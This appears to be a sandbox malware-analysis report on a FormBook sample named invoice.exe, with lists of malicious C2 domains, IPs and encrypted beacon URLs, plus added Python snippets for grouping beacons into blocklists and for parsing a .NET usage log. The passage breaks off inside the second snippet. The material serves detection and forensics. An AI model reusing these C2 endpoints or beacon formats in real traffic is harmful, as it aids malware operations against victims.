                                                                    http://www.jiyu-kobo.co.jp/invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.galapagosdesign.com/DPleaseinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers8invoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zipinvoice.exefalse
                                                                        high
                                                                        http://www.fonts.cominvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://www.sandoll.co.krinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.urwpp.deDPleaseinvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://www.zhongyicts.com.cninvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameinvoice.exe, 00000000.00000002.245256874.0000000002EBE000.00000004.00000001.sdmp, invoice.exe, 00000000.00000002.245138274.0000000002EA1000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://www.sakkal.cominvoice.exe, 00000000.00000002.251392987.0000000006E22000.00000004.00000001.sdmp, explorer.exe, 00000004.00000000.272462034.000000000BC30000.00000002.00000001.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            • URL Reputation: safe
                                                                            unknown

                                                                            Contacted IPs


                                                                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
192.0.78.24 | legacyadmin.support | United States | 2635 | AUTOMATTICUS | true
35.156.117.131 | www.jinlan.online.s.strikinglydns.com | United States | 16509 | AMAZON-02US | true
208.91.197.91 | www.knoxvilleoutdoorkitchens.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
74.208.236.64 | www.highdeserthealthinsurance.com | United States | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
184.168.131.241 | flowhcf.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true
2.57.90.16 | armaccountingbs.com | Lithuania | 47583 | AS-HOSTINGERLT | true
177.55.108.130 | hotelmaktub.com | Brazil | 53057 | RedeHostInternetLtdaBR | true

                                                                            Private

                                                                            IP
                                                                            192.168.2.1

                                                                            General Information

                                                                            Joe Sandbox Version:31.0.0 Emerald
                                                                            Analysis ID:383898
                                                                            Start date:08.04.2021
                                                                            Start time:12:02:34
                                                                            Joe Sandbox Product:CloudBasic
                                                                            Overall analysis duration:0h 10m 57s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:light
                                                                            Sample file name:invoice.exe
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:27
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:1
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • HDC enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.evad.winEXE@7/1@15/8
                                                                            EGA Information:Failed
                                                                            HDC Information:
                                                                            • Successful, ratio: 16.7% (good quality ratio 14.8%)
                                                                            • Quality average: 69.4%
                                                                            • Quality standard deviation: 33.4%
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 0
                                                                            Cookbook Comments:
                                                                            • Adjust boot time
                                                                            • Enable AMSI
                                                                            • Found application associated with file extension: .exe
                                                                            Warnings:
                                                                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                            • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 93.184.220.29, 20.82.210.154, 52.255.188.83, 104.43.193.48, 23.54.113.53, 104.43.139.144, 95.100.54.203, 13.107.5.88, 13.107.42.23, 20.50.102.62, 172.217.168.19, 23.10.249.26, 23.10.249.43, 20.54.26.129
                                                                            • Excluded domains from analysis (whitelisted): ghs.google.com, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, client-office365-tas.msedge.net, ocos-office365-s2s.msedge.net, config.edge.skype.com.trafficmanager.net, store-images.s-microsoft.com-c.edgekey.net, e-0009.e-msedge.net, config-edge-skype.l-0014.l-msedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, l-0014.config.skype.com, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, config.edge.skype.com, www.bing.com, fs.microsoft.com, afdo-tas-offload.trafficmanager.net, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ocos-office365-s2s-msedge-net.e-0009.e-msedge.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, l-0014.l-msedge.net
                                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                                            Simulations

                                                                            Behavior and APIs

Time | Type | Description
12:03:30 | API Interceptor | 1x Sleep call for process: invoice.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                            192.0.78.24o2KKHvtb3c.exeGet hashmaliciousBrowse
                                                                            • www.translations.tools/nsag/?GTgP=1Yx90tXdezyuV8sDZLNplGUVoptWSuBjE4/oeiBfqPIPAmaYyomwKJS6i2A6lUxe1bSuh3UNpg==&5jr=UlSpj
                                                                            PO#41000055885.exeGet hashmaliciousBrowse
                                                                            • www.billpollakwritingandediting.com/s2oc/?GzrL=WBjT_rUpa&8pDp00Hp=iEnqtY0VDkZROpxH3svCV1z4vh0RNvDxHQ/1OCo0cqhO00C//BGB8bIyEE+Kz7q/Bf/i
                                                                            swift_76567643.exeGet hashmaliciousBrowse
                                                                            • www.robztech.com/m8es/?CVJ=t8DGnXKWWWU8raNxivnbQjw3Z37WBEdYjZZIAloy7atrUUbC+CA3ztV2uFkjRRfw03U+&oX9=Txo8ntB0WBsp
                                                                            PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                            • www.ichaugames.com/edbs/?LZ9p=YgPC843WNdMasmCWk8z83XX/O5HllNmlhNkRKlPYh5DfpYamg+RMipCIUjeKta/lrbmo&MnZ=GXLpz
                                                                            Swift.exeGet hashmaliciousBrowse
                                                                            • www.pranatarot.com/edbs/?M6AlI=DP8A5Ne5M9xGBq1tjWprXkQLMPcjoeoXNStDN+ay4cQr/vSv+J0F/9nmPhuRTLw7c/6NIAJFgw==&T8RH=9rqdJ4wpALk
                                                                            TNUiVpymgH.exeGet hashmaliciousBrowse
                                                                            • www.longdoggy.net/vu9b/?yhRdNvKX=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZHNP/pygFH&Sj=CTFH
                                                                            Swift Advise.exeGet hashmaliciousBrowse
                                                                            • www.billpollakwritingandediting.com/s2oc/?Hlnxrrv=iEnqtY0VDkZROpxH3svCV1z4vh0RNvDxHQ/1OCo0cqhO00C//BGB8bIyEE+gsLa/Fd3i&N48xBX=5jrXZXrHL6gpNHc
                                                                            vfe1GoeC5F.exeGet hashmaliciousBrowse
                                                                            • www.emmajanetracy.com/iu4d/?wTPHg6=ZliXVxFXgH&F8Sl=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkLnRBXIBtcN
                                                                            New Purchase Order GH934782GHY489330.exeGet hashmaliciousBrowse
                                                                            • www.texasgirlcooks.com/n8ih/?FRd4X8=LwVPcdZXggMsOEqjpBC1UWbJi/W0BJRKlKtnOmrCDSW2VJzQcSCcpwg+xjq2DIU/ljr6&v8yH=ZPGXSpGP_
                                                                            enlu5xSNKV.exeGet hashmaliciousBrowse
                                                                            • www.mels.ink/jzvu/?T48h3FW=iJYv1UkuT0Zpi+IGsxHty87S2Dat4Pv7Wp3PPo6PPkk3ttxekOlDn9vNvymr9ZuQ7HO4&GPGXR=rVgD9v10QRyTEj
                                                                            KL9fcbfrMB.exeGet hashmaliciousBrowse
                                                                            • www.micheldrake.com/p2io/?TT=FjUh3Tu&idCtDnlP=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE
                                                                            Bs04AQyK2o.exeGet hashmaliciousBrowse
                                                                            • www.blake-skinner.com/cyna/?GzuD=PDCWDhm1FORq+rZomwaGxMfk5udIXQ8UnpXBsbRxRfrc3sHkOqGAjqDUEuQ1Be52SJ1X&AnB=O0DXDNwPE
                                                                            DXeJI2nlOG.exeGet hashmaliciousBrowse
                                                                            • www.longdoggy.net/vu9b/?jPg8q=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2o1XR+jS1VsWAWCG5Q==&nbEHs=jFNtdTXxm
                                                                            Rz9fvf4OTb.exeGet hashmaliciousBrowse
                                                                            • www.oklahomacfs.com/gts/?YB0x2ft8=PA67ZkolMfBFCI4mOjQDIsof7zDtaA6aTfME7PP0+Fx0ghZxyy52dimMDrUfoPufFN5g&Vr=LhnLH8Hph
                                                                            Doc.exeGet hashmaliciousBrowse
                                                                            • www.summit-fall.com/q8be/?Wrg=4hnHMfUXP&jDHtm=PvpSyhwaK0EPkwK3lIaPMDnFk8sqPd4QRGTJe178Ccz19CG/ZacuMU3Q8hVSYAMnSG3u
                                                                            order samples 056-062 _pdf.exeGet hashmaliciousBrowse
                                                                            • www.talesontwowheels.com/nu8e/?7ntLT=BUO3cM6bBv9ZuCKW4ifJ+Pyw8zjobdDvL9OFzJCTcSEVCDIw9t8JRYv77i9NgmLL6sLM&v4Xpf=oBZl2rip
                                                                            yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                            • www.espressoandhoney.com/gts/?8p=2dRTAnw8b&uDHXm=EzY5lfbdKr94xDCu9UGw63kyV4asBdh+DU/WNzhiAESrVolwAii5R+YbRgqBWfyCYIrF
                                                                            PO_210316.exe.exeGet hashmaliciousBrowse
                                                                            • www.duncantraining.com/ntg/?tXUp=YP7DfZXHo&p0D=pJ3E5H0AXs3SyFTGH0EJGGbFjKRwNMwKWWcsy0pCeIK4FiOVM3d0QBCPOWB+ULVSbRXF
                                                                            NEW ORDER QUOTATION.xlsxGet hashmaliciousBrowse
                                                                            • www.earth-emily.com/4qdc/?qDKt=Wph7KmT0uL3Cs02FLA1oy52G3sDFb69Rya6X81f4dYa3z5cXpdxP3Vix0KXZYCXkaGKP+A==&BFQLa6=QL08lznxCVnXyzKP
                                                                            OPSzlwylj5.exeGet hashmaliciousBrowse
                                                                            • www.leadeligey.com/bw82/?Rxo=vUh86D2kaUcvG8cSXUIE+TYOTfOFz6ihzRiGvCHG7B+/lKZzNCz3xlSTvPJyBkyGX6Ae&MJBx=FdCx5LDXHnmh2JEP
208.91.197.91
  TazxfJHRhq.exe | malicious | www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu
  8sxgohtHjM.exe | malicious | www.newmandu.com/vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x
  PRC-20-518 ORIGINAL.xlsx | malicious | www.chitrakaah.com/g050/?MBN0yn=gh6gYfQCrnQBnQvKqXR1BBdq6I0/ia6nXcyoJzz4U03ljs0U8DV8qCnN3+fv2J4IGdTu1A==&2dht=XHE0Qdm
  ORIGINAL SHIPPING DOCUMENTSPDF.exe | malicious | www.rajeshpaul.com/qqeq/?D8IxB=7nSpJtUpafTlT6&eb=my9HLCyGyTUI7ijeZNMt9rsHqU3anFReddNHkecDwv0iZCMXfCC6FueMusiXp9GGW0pUqn5axA==
  PO#7689.zip.exe | malicious | www.greenlightsmokables.com/md5/?Jzu4_4C=zHBqlneB+dU0jWTqKpl7P0UhTg+HlH4MpY8JEipF1WP+CJ4l7o5pEqU4RJVuKm5urAdq&NrThfj=D48x
  products order pdf.exe | malicious | www.tudeladirecto.com/nt8e/?wTX=EFNpsN9xNb-Dd&n4p=d5sTnujAaLwCHAV7Hkod4AGONRw1Ceya8p7QHyuAjU2hemaQC5CnvhOz2MROTqxwdpcV
  7Q5Er1TObp.exe | malicious | www.newmandu.com/vu9b/?FTjl4F=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&vRDtx=khL0M89p_R8hBZa
  New Purchase Order.exe | malicious | www.fairview.global/noi6/?Ktklc=djQtGmR2ozp5r2jxyahjtN1TJLTs4NvNMxVFhpbWlLclFF8JTFJQ/pXyn76jfICi7GGZ&lzul=z8o4n2BhWV
  Bombermania.exe | malicious | live.interballs.com/reporting_server/
  Bombermania.exe | malicious | live.interballs.com/reporting_server/
  2021_03_16.exe | malicious | www.ltc-gold.com/2bg/?lnud=/i/Ib+Dffob7lMQ5ivcx1VEzEzf2K5SYmZpCl/xPFCYFxY/A/vBZb7BF8LsLTj5bzBQKXYQmxg==&1bm=3fedQNQ0wlQl0H
  orii11.exe | malicious | www.fotoincasa.com/mdi/?8pp=r1iONhcrP0pbpGclQVhVGgc+Q37F54QKHkqxX6oGe/sLqU52wzsf7IojbzpCHshmMIC4&sZCx=1bYdfPf8ef5pjPm
  bnb.exe | malicious | www.fotoincasa.com/mdi/?Jh=r1iONhcrP0pbpGclQVhVGgc+Q37F54QKHkqxX6oGe/sLqU52wzsf7IojbzpoYcRmIKK4&njl0d=Rzuls4
  Purchase Order.exe | malicious | www.fairview.global/noi6/?rXOp32I=djQtGmR2ozp5r2jxyahjtN1TJLTs4NvNMxVFhpbWlLclFF8JTFJQ/pXyn76JA4yi/EOZ&Bd4Dh=CX6p
  PO_98276300.exe | malicious | www.ojaveda.com/ame8/?8p=TUdynzXewDV4R6hcP/TtpIkDjP+ZRmt16Hw3snKWLRaKzibVm3POi5J75QFaIAfkEyg3&Cb=hN98bjZH
  DHL_receipt.exe | malicious | www.greenlightsmokable.com/s8gq/?GVTl=CdTDr&CtxLR=GcXO2IQJXedQXP0VXXtwOzFelwMaLaizNNb08pvp0e1v1F0rbo8J5l47qDnDSsA31Tvl
  QUOTATION00187612.exe | malicious | www.gamingmag.online/nsk/?5juH1Lw=DnZ6smjvmKtwuwAXRixl0xHJiuXjV7QbSQXcUxw83NwxPjQzvt78aHwZY7I20FYugkDr&kxl0dL=nDH8a8R86Pb8o
  AWB-INVOICE_PDF.exe | malicious | www.pathwaysnorman.com/idir/?jFNhC=QcfpPsZsTQkbfi9dIqkstDiu8gpji7zGKQT9CcYXB17rdgdInICGKPMkjk7u0mNGiAFDxGC1Zg==&PlHT0=_6g89p5H3xehg
  DHL Document. PDF.exe | malicious | www.xpresssteamironing.com/d8ak/?Szr0s4=GfmXTYq2Yn2AckQWwnE6BBibtFv31Qjt2UWEfiHUUpW9PpEAUCSsafVf838QtlI0BZoH7o+vNw==&QL3=uTyTqJdh5XE07
  INV.xlsx | malicious | www.h-v-biz.com/c8so/?cf=hsMrMOU/4wmWTnQK7BegBqlrTsujOywA7VbOIqdg4Ej/UmxkJ2Rbh4V4PlD+e7xk19hcsA==&nH4xu=erRXJfgPJ
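The context rows above are the beacon URLs of other FormBook samples that used the same C2 IP as invoice.exe. They share a shape: a short alphanumeric path segment, then exactly two query parameters, one a long base64-style encrypted payload and one a short token. The parameter names rotate between samples, and the long value is not always first (compare www.rajeshpaul.com and www.tudeladirecto.com with the others), so a blocklist or hunting rule should key on host plus path, not on the full URL. The script below is an added example in Python and is not part of the Joe Sandbox report. The URL list is copied from the rows above; the path, payload-length and short-parameter thresholds are my assumptions, tuned on those rows. It groups beacons by C2 and also reports payloads that recur byte-for-byte under different parameter names, as the two www.newmandu.com rows do.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Beacon URLs copied from the context rows above. The last entry belongs to a
# non-FormBook sample (Bombermania.exe) and serves as a negative case.
OBSERVED_URLS = [
    "www.jamessicilia.com/evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu",
    "www.newmandu.com/vu9b/?0pn=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&uZQL2=D48x",
    "www.newmandu.com/vu9b/?FTjl4F=gvDMKnL2DiygUqkLOW8equ0SBtiZsQsp9RF77GdE0oWtaZL2dcC9ipMcSo2LbyxlKRwH&vRDtx=khL0M89p_R8hBZa",
    "www.fairview.global/noi6/?Ktklc=djQtGmR2ozp5r2jxyahjtN1TJLTs4NvNMxVFhpbWlLclFF8JTFJQ/pXyn76jfICi7GGZ&lzul=z8o4n2BhWV",
    "www.fairview.global/noi6/?rXOp32I=djQtGmR2ozp5r2jxyahjtN1TJLTs4NvNMxVFhpbWlLclFF8JTFJQ/pXyn76JA4yi/EOZ&Bd4Dh=CX6p",
    "www.fotoincasa.com/mdi/?8pp=r1iONhcrP0pbpGclQVhVGgc+Q37F54QKHkqxX6oGe/sLqU52wzsf7IojbzpCHshmMIC4&sZCx=1bYdfPf8ef5pjPm",
    "www.fotoincasa.com/mdi/?Jh=r1iONhcrP0pbpGclQVhVGgc+Q37F54QKHkqxX6oGe/sLqU52wzsf7IojbzpoYcRmIKK4&njl0d=Rzuls4",
    "www.rajeshpaul.com/qqeq/?D8IxB=7nSpJtUpafTlT6&eb=my9HLCyGyTUI7ijeZNMt9rsHqU3anFReddNHkecDwv0iZCMXfCC6FueMusiXp9GGW0pUqn5axA==",
    "www.tudeladirecto.com/nt8e/?wTX=EFNpsN9xNb-Dd&n4p=d5sTnujAaLwCHAV7Hkod4AGONRw1Ceya8p7QHyuAjU2hemaQC5CnvhOz2MROTqxwdpcV",
    "www.greenlightsmokable.com/s8gq/?GVTl=CdTDr&CtxLR=GcXO2IQJXedQXP0VXXtwOzFelwMaLaizNNb08pvp0e1v1F0rbo8J5l47qDnDSsA31Tvl",
    "live.interballs.com/reporting_server/",
]

# Heuristics (my assumptions, tuned on the rows above): short alphanumeric path,
# one long base64-style value, one short token, in either order.
PATH_RE = re.compile(r"^/[A-Za-z0-9]{2,6}/$")
PAYLOAD_RE = re.compile(r"^[A-Za-z0-9+/=_-]{40,}$")
MAX_SHORT = 20


def parse_beacon(url: str):
    """Return (host, path, [(key, value), ...]) without percent-decoding the query."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    params = []
    if parts.query:
        for pair in parts.query.split("&"):
            key, _, value = pair.partition("=")
            params.append((key, value))  # '+' and '/' are payload bytes, not URL encoding
    return parts.hostname, parts.path, params


def beacon_parts(url: str):
    """Return (c2_key, payload, short_token) for a FormBook-shaped URL, else None."""
    host, path, params = parse_beacon(url)
    if host is None or not PATH_RE.match(path) or len(params) != 2:
        return None
    values = [v for _, v in params]
    long_vals = [v for v in values if PAYLOAD_RE.match(v)]
    short_vals = [v for v in values if 0 < len(v) <= MAX_SHORT]
    if len(long_vals) != 1 or len(short_vals) != 1:
        return None
    return f"{host}{path}", long_vals[0], short_vals[0]


def group_by_c2(urls):
    """Map each C2 (host + path, the stable part) to the beacon URLs seen for it."""
    groups = defaultdict(list)
    for url in urls:
        parts = beacon_parts(url)
        if parts is not None:
            groups[parts[0]].append(url)
    return dict(groups)


def shared_payloads(urls):
    """Map a payload value to the URLs that carry it byte-for-byte under different
    parameter names; identical payloads point at the same build talking to the same C2."""
    seen = defaultdict(list)
    for url in urls:
        parts = beacon_parts(url)
        if parts is not None:
            seen[parts[1]].append(url)
    return {payload: hits for payload, hits in seen.items() if len(hits) > 1}


if __name__ == "__main__":
    for c2, hits in group_by_c2(OBSERVED_URLS).items():
        print(f"{c2}: {len(hits)} beacon(s)")
    for payload, hits in shared_payloads(OBSERVED_URLS).items():
        print(f"payload {payload[:16]}... repeated in {len(hits)} URLs")
```

The interballs URL is rejected by both the path and the parameter checks, which is the point of keeping it in the input: a C2 list scraped from a sandbox context table mixes families, and the shape test separates them before anything goes into a blocklist.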

                                                                            Domains

                                                                            No context

                                                                            ASN

Match | Associated Sample Name / URL | Detection | Context
CONFLUENCE-NETWORK-INC (VG)
  TazxfJHRhq.exe | malicious | 208.91.197.91
  8sxgohtHjM.exe | malicious | 208.91.197.91
  PO7321.exe | malicious | 208.91.197.39
  PRC-20-518 ORIGINAL.xlsx | malicious | 208.91.197.39
  Lista e porosive te blerjes.exe | malicious | 209.99.64.33
  BL836477488575.exe | malicious | 204.11.56.48
  BL84995005038483.exe | malicious | 204.11.56.48
  DHL Shipping Documents.exe | malicious | 208.91.197.27
  Formbook.exe | malicious | 204.11.56.48
  ORIGINAL SHIPPING DOCUMENTSPDF.exe | malicious | 208.91.197.91
  PDF NEW P.OJerhWEMSj4RnE4Z.exe | malicious | 208.91.197.27
  bank details.exe | malicious | 208.91.197.27
  PO#7689.zip.exe | malicious | 208.91.197.91
  ORDER_PDF.exe | malicious | 209.99.64.18
  deIt7iuD1y.exe | malicious | 204.11.56.48
  Bista_094924,ppdf.exe | malicious | 208.91.197.27
  PO_RFQ007899_PDF.exe | malicious | 209.99.64.55
  PaymentInvoice.exe | malicious | 208.91.197.39
  products order pdf.exe | malicious | 208.91.197.91
  ZGNbR8E726.exe | malicious | 204.11.56.48
AUTOMATTIC (US)
  0BAdCQQVtP.exe | malicious | 192.0.78.175
  vbc.exe | malicious | 192.0.78.25
  o2KKHvtb3c.exe | malicious | 192.0.78.24
  PO#41000055885.exe | malicious | 192.0.78.24
  BL836477488575.exe | malicious | 192.0.78.194
  FARASIS.xlsx | malicious | 192.0.79.33
  FARASIS.xlsx | malicious | 192.0.79.32
  RFQ-V-SAM-0321D056-DOC.exe | malicious | 192.0.78.25
  swift_76567643.exe | malicious | 192.0.78.24
  PDF NEW P.OJerhWEMSj4RnE4Z.exe | malicious | 192.0.78.24
  yQh96Jd6TZ.exe | malicious | 192.0.78.25
  Swift.exe | malicious | 192.0.78.24
  TNUiVpymgH.exe | malicious | 192.0.78.24
  g0g865fQ2S.exe | malicious | 192.0.78.25
  Original Invoice-COAU7230734290.xlsx | malicious | 192.0.78.25
  TSPO0001978-xlxs.exe | malicious | 192.0.78.231
  Swift Advise.exe | malicious | 192.0.78.24
  RMwfvA9kZy.exe | malicious | 192.0.78.25
  vfe1GoeC5F.exe | malicious | 192.0.78.24
  New Purchase Order GH934782GHY489330.exe | malicious | 192.0.78.24
AMAZON-02 (US)
  Calt7BoW2a.exe | malicious | 3.14.206.30
  0BAdCQQVtP.exe | malicious | 52.40.12.112
  TazxfJHRhq.exe | malicious | 52.216.152.43
  1wOdXavtlE.exe | malicious | 52.216.179.59
  hvEop8Y70Y.exe | malicious | 15.165.26.252
  8sxgohtHjM.exe | malicious | 3.13.255.157
  eQLPRPErea.exe | malicious | 13.248.216.40
  vbc.exe | malicious | 3.13.255.157
  o2KKHvtb3c.exe | malicious | 18.218.104.192
  Order Inquiry.exe | malicious | 3.14.206.30
  6IGbftBsBg.exe | malicious | 104.192.141.1
  nicoleta.fagaras-DHL_TRACKING_1394942.html | malicious | 52.218.213.96
  PaymentAdvice.exe | malicious | 3.14.206.30
  ikoAImKWvI.exe | malicious | 104.192.141.1
  BL01345678053567.exe | malicious | 3.14.206.30
  AL JUNEIDI LIST.xlsx | malicious | 65.0.168.152
  DYANAMIC Inquiry.xlsx | malicious | 65.0.168.152
  Statement of Account.xlsx | malicious | 15.165.26.252
  Shipping Documents.xlsx | malicious | 52.217.8.51
  bmws51TeIm.exe | malicious | 3.141.177.1

                                                                            JA3 Fingerprints

                                                                            No context

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice.exe.log
                                                                            Process:C:\Users\user\Desktop\invoice.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1314
                                                                            Entropy (8bit):5.350128552078965
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                            MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                            SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                            SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                            SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                            Malicious:true
                                                                            Reputation:high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

Despite the Malicious flag, the content is the standard assembly-binding usage log that the .NET 4 runtime writes for every managed application it runs, which is what the benign reputation reflects. Its value is forensic rather than as a payload: it shows that invoice.exe bound Microsoft.VisualBasic and System.Windows.Forms alongside the core framework assemblies, which points to a VB.NET-compiled loader stage ahead of the injected FormBook payload.
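The usage log above is worth parsing rather than eyeballing, because on a compromised host the same file under CLR_v4.0_32\UsageLogs (or CLR_v4.0 for 64-bit) records every assembly the loader bound, including any non-framework helper or payload assembly. The parser below is an added example in Python, not part of the Joe Sandbox report. Its sample input is reconstructed from the preview above (the `..` in the preview is the CRLF line ending) with the truncated System.Xml record left out. The meaning given to the first column is my inference from the rows, not documented behaviour: 1 is a runtime flag, 2 an assembly bound from IL, 3 an assembly bound through the native image whose path follows.

```python
import csv
import io

# Reconstructed from the file preview above ('..' there is CRLF); the truncated
# System.Xml record at the end of the preview is left out.
USAGE_LOG = (
    '1,"fusion","GAC",0\r\n'
    '1,"WinRT","NotApp",1\r\n'
    '2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0\r\n'
    '2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0\r\n'
    '3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",'
    '"C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\\System.ni.dll",0\r\n'
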